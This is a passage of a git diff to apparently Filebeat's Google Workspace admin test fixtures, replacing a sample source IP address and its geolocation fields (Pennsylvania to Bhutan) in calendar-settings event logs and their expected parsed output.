         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -474,26 +442,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4114,
+        "log.offset": 4106,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log
index bcbed9ee8866..6a2cc3c30726 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log
@@ -1,13 +1,13 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json
index be2cca866609..9d5d112ce76d 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -24,23 +24,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -61,7 +57,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -74,26 +70,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 414,
+        "log.offset": 413,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -114,7 +106,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -130,26 +122,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 828,
+        "log.offset": 826,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -170,7 +158,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -183,26 +171,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1361,
+        "log.offset": 1358,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -223,7 +207,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -236,26 +220,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1784,
+        "log.offset": 1780,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -276,7 +256,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
